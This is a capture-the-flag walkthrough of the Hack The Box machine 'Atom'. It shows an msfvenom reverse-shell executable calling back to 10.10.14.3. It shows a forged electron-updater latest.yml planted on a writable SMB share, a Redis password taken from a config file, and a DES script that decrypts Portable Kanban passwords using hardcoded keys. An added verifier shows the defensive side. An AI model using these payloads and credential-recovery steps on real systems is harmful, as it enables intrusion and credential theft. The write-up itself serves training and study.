Atom

htb windows medium electron-updater smb redis portable-kanban yaml-injection

Machine Information

  • Platform: Windows
  • Difficulty: Medium
  • IP Address: 10.129.230.162

Initial Enumeration

Nmap Scan

attacker@kali:~$ nmap -sV -sT -p- --min-rate 5000 10.129.230.162
Nmap Scan Results

Key services: SMB (445), Redis (6379), WinRM (5985)


Service Enumeration

SMB Enumeration

attacker@kali:~$ smbmap -H 10.129.230.162 -u test -p test
SMB Share Enumeration
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.230.162:445    Name: atom    Status: Authenticated
        Disk                 Permissions    Comment
        ----                 -----------    -------
        ADMIN$               NO ACCESS      Remote Admin
        C$                   NO ACCESS      Default share
        IPC$                 READ ONLY      Remote IPC
        Software_Updates     READ, WRITE

The Software_Updates share has READ/WRITE access with guest credentials!

Exploring Software_Updates Share

attacker@kali:~$ smbclient --no-pass //10.129.230.162/Software_Updates
Directory Listing
smb: \> ls
  .                                   D        0  Fri May 17 17:36:55 2024
  ..                                  D        0  Fri May 17 17:36:55 2024
  client1                             D        0  Fri May 17 17:36:55 2024
  client2                             D        0  Fri May 17 17:36:55 2024
  client3                             D        0  Fri May 17 17:36:55 2024
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 07:18:08 2021
smb: \> get UAT_Testing_Procedures.pdf

The PDF contains UAT testing procedures for a note-taking application called “heed”.


Exploitation

Analyzing the Electron Application

After examining the installer extracted from the PDF documentation, I found the application uses Electron with auto-update functionality.

Extracted Application Structure

$PLUGINSDIR/app-64/resources/
├── app.asar
├── app-update.yml
├── electron.asar
├── elevate.exe
└── node_modules/

Finding the Update Configuration

app-update.yml

provider: generic
url: 'http://updates.atom.htb'
publisherName:
  - HackTheBox

The application checks http://updates.atom.htb for updates!

Extracting app.asar

attacker@kali:~$ npx asar extract app.asar dest-dir
attacker@kali:~$ cd dest-dir
attacker@kali:~/dest-dir$ cat package.json
package.json

{
  "name": "heedv1",
  "version": "1.0.0",
  "main": "main.js",
  "dependencies": {
    "electron-updater": "^2.23.3",
    "electron-log": "^1.3.0",
    "url": "^0.11.0"
  }
}
Vulnerable Dependency
The application uses electron-updater 2.23.3, a release from 2018 that is severely outdated (the current version is 6.2.1). This version is vulnerable to signature bypass and malicious update injection.

Crafting Malicious Update Package

The electron-updater package checks the Software_Updates SMB share for a latest.yml file that defines update metadata.

Step 1: Create reverse shell payload

attacker@kali:~$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > "a'tom.exe"
Payload Generation
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes

Step 2: Calculate SHA-512 hash

attacker@kali:~$ shasum -a 512 "a'tom.exe" | cut -d " " -f1 | xxd -r -p | base64
SHA-512 Hash
Qdk9GLbxYATk99IYFpMGOgKzb/0dCfcQqRNi+2pnp3yNjX2uZtLdr7rcqkSzwh5b9H64iWo5V4pM01Z5OTtNPA==

Step 3: Create latest.yml update manifest

latest.yml

version: 1.2.3
path: http://10.10.14.3/a'tom.exe
sha512: Qdk9GLbxYATk99IYFpMGOgKzb/0dCfcQqRNi+2pnp3yNjX2uZtLdr7rcqkSzwh5b9H64iWo5V4pM01Z5OTtNPA==
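The sha512 field above is the raw SHA-512 digest of the file, base64-encoded, which is exactly what the shasum | xxd -r -p | base64 pipeline in step 2 produces. The following added example (stdlib-only Python written for this page, not electron-updater's own code) reproduces that encoding, parses a latest.yml, and performs the two checks a hardened updater should make before applying an update: the digest must match the downloaded bytes, and the manifest's path must resolve on the configured update origin rather than to an arbitrary host. The sample installer bytes, the version string and the helper names are constructed for the example; the update URL is the one from app-update.yml on this page, and the manifest parser assumes the flat key: value layout shown above.

```python
#!/usr/bin/env python3
"""Verify an electron-updater style latest.yml against a downloaded file.

Added example (not electron-updater's code): the sha512 field is the raw
SHA-512 digest, base64-encoded. Besides the digest check, a hardened updater
should refuse a `path` that resolves off the configured update origin.
"""
import base64
import hashlib
import hmac
from urllib.parse import urljoin, urlsplit

# Constructed sample inputs; UPDATE_URL is the value from app-update.yml.
UPDATE_URL = "http://updates.atom.htb"
SAMPLE_BINARY = b"MZ\x90\x00constructed-sample-installer-bytes"


def sha512_b64(data: bytes) -> str:
    """Base64 of the raw SHA-512 digest, the encoding latest.yml uses."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def parse_manifest(text: str) -> dict:
    """Minimal parser for the flat `key: value` lines of latest.yml.

    Assumption: no nested YAML; surrounding quotes on values are stripped.
    """
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        key, value = line.split(":", 1)
        manifest[key.strip()] = value.strip().strip("'\"")
    return manifest


def resolve_path(update_url: str, path: str) -> str:
    """Resolve `path` against the update URL; an absolute URL stays as given."""
    return urljoin(update_url.rstrip("/") + "/", path)


def same_origin(update_url: str, resolved: str) -> bool:
    """True when scheme and host:port of both URLs match."""
    a, b = urlsplit(update_url), urlsplit(resolved)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)


def verify_update(manifest_text: str, downloaded: bytes,
                  update_url: str = UPDATE_URL) -> tuple:
    """Return (ok, reason); ok is True only when every check passes."""
    m = parse_manifest(manifest_text)
    for field in ("version", "path", "sha512"):
        if field not in m:
            return False, f"manifest missing {field}"
    resolved = resolve_path(update_url, m["path"])
    if not same_origin(update_url, resolved):
        return False, f"path resolves off the update origin: {resolved}"
    # Constant-time comparison of expected and actual digests.
    if not hmac.compare_digest(sha512_b64(downloaded), m["sha512"]):
        return False, "sha512 mismatch"
    return True, f"ok: version {m['version']} from {resolved}"


def build_manifest(version: str, path: str, data: bytes) -> str:
    """Produce a latest.yml in the same three-field layout the page shows."""
    return f"version: {version}\npath: {path}\nsha512: {sha512_b64(data)}\n"


if __name__ == "__main__":
    good = build_manifest("1.2.3", "heed-1.2.3.exe", SAMPLE_BINARY)
    print(verify_update(good, SAMPLE_BINARY))
    # Correct digest but an absolute path to another host: rejected by the
    # origin check before the hash is even compared.
    rogue = build_manifest("1.2.3", "http://10.10.14.3/a'tom.exe", SAMPLE_BINARY)
    print(verify_update(rogue, SAMPLE_BINARY))
    # Same manifest, tampered download: rejected by the digest check.
    print(verify_update(good, SAMPLE_BINARY + b"\x00"))
```

The origin check is the part that matters for this box: a digest alone only proves the file matches whatever the manifest author wrote, so an attacker who can write latest.yml can always supply a matching hash. Pinning the download to the configured origin (and, as the takeaways note, requiring a signature over the manifest) is what removes the write-to-share attack path.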

Delivering the Payload

# Terminal 1: Start HTTP server to host payload
attacker@kali:~$ python3 -m http.server 80

# Terminal 2: Start netcat listener
attacker@kali:~$ nc -lvnp 4444

# Terminal 3: Upload latest.yml to SMB share
attacker@kali:~$ smbclient --no-pass //10.129.230.162/Software_Updates
Upload latest.yml
smb: \> cd client1
smb: \client1\> put latest.yml
putting file latest.yml as \client1\latest.yml (1.5 kb/s) (average 1.5 kb/s)

Reverse Shell

After about 60 seconds, the application auto-updates and executes our payload:

Reverse Shell Connection
# Python HTTP Server
10.129.230.162 - - [20/May/2024 21:55:14] "GET /a%27tom.exe HTTP/1.1" 200 -

# Netcat listener
connect to [10.10.14.3] from (UNKNOWN) [10.129.230.162] 63920
Microsoft Windows [Version 10.0.19042.906]

C:\WINDOWS\system32>whoami
atom\jason
Initial Access Obtained
We have a shell as jason through the Electron auto-updater vulnerability!

Post-Exploitation Enumeration

Redis Discovery

C:\Program Files\Redis>dir
Redis Directory Contents
 Directory of C:\Program Files\Redis

05/20/2024  06:31 PM    <DIR>          .
05/20/2024  06:31 PM    <DIR>          ..
07/01/2016  03:54 PM             1,024 EventLog.dll
04/02/2021  07:31 AM    <DIR>          Logs
07/01/2016  03:55 PM           406,016 redis-benchmark.exe
07/01/2016  03:55 PM           482,304 redis-cli.exe
07/01/2016  03:55 PM         1,553,408 redis-server.exe
04/02/2021  07:39 AM            43,962 redis.windows-service.conf
04/02/2021  07:37 AM            43,960 redis.windows.conf

Redis Configuration

C:\Program Files\Redis>type redis.windows-service.conf | findstr "requirepass"
Redis Configuration
# Redis configuration file
requirepass kidvscat_yes_kidvscat

Redis Password: kidvscat_yes_kidvscat


Privilege Escalation

Accessing Redis Database

attacker@kali:~$ redis-cli -h atom.htb -p 6379 --pass kidvscat_yes_kidvscat
Redis Database Enumeration
atom.htb:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:ids:User"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
atom.htb:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0

{
  "Id":"e8e29158d70d44b1a1ba4949d52790a0",
  "Name":"Administrator",
  "Email":"",
  "EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi",
  "Role":"Admin",
  "Inactive":false,
  "TimeStamp":637530169606440253
}

The Redis database contains an encrypted Administrator password for Portable Kanban!

Decrypting Portable Kanban Password

Portable Kanban uses a hardcoded DES key and IV for password encryption, so anyone holding the stored value can recover the plaintext. I created a decryption script:

decrypt.py

#!/usr/bin/env python3
# Decrypt a Portable Kanban password: base64-decode the stored value, then
# DES-CBC decrypt it with the key and IV hardcoded in Portable Kanban.
import base64
import binascii
import sys

from des import DesKey  # python3 -m pip install des

KEY = b"7ly6UznJ"  # hardcoded DES key
IV = b"XuVUm5fR"   # hardcoded CBC IV


def decrypt(encoded: str) -> str:
    ciphertext = base64.b64decode(encoded.encode("utf-8"))
    key = DesKey(KEY)
    return key.decrypt(ciphertext, initial=IV, padding=True).decode("utf-8")


if __name__ == "__main__":
    # Accept the value as an argument or prompt for it.
    encoded = sys.argv[1] if len(sys.argv) > 1 else input("Enter the Hash : ")
    try:
        print("Decrypted Password : " + decrypt(encoded))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        print("Wrong Hash")
attacker@kali:~$ python3 decrypt.py
Decryption Output
Enter the Hash : Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
Decrypted Password : kidvscat_admin_@123

Administrator Credentials: administrator:kidvscat_admin_@123

WinRM Access as Administrator

attacker@kali:~$ evil-winrm -i 10.129.230.162 -u 'administrator' -p 'kidvscat_admin_@123'
Evil-WinRM Connection
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
Root Access Obtained
Successfully escalated to Administrator through Redis credential extraction and Portable Kanban password decryption!

Loot

Credentials

🔐 WinRM
Username: administrator
Password: kidvscat_admin_@123
Host: 10.129.230.162
Notes: Decrypted from Portable Kanban Redis database
🔐 Redis
Username: redis
Password: kidvscat_yes_kidvscat
Host: 10.129.230.162
Port: 6379
Notes: Found in C:\Program Files\Redis\redis.windows-service.conf

Encrypted Password

BASE64 Portable Kanban Encrypted Password (DES)
Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi

Key Takeaways

  1. Electron auto-updater vulnerabilities (especially outdated versions like 2.23.3) allow malicious update injection when update sources are writable
  2. SMB shares with write access can be leveraged to deliver malicious update manifests (latest.yml)
  3. Redis configuration files often contain plaintext passwords that provide access to sensitive databases
  4. Portable Kanban uses hardcoded DES encryption keys (7ly6UznJ and IV XuVUm5fR), making encrypted passwords trivially decryptable
  5. Always check for outdated dependencies in package.json: electron-updater 2.23.3 was released in 2018 and lacks effective signature verification
  6. Auto-update mechanisms should verify cryptographic signatures and use HTTPS with certificate pinning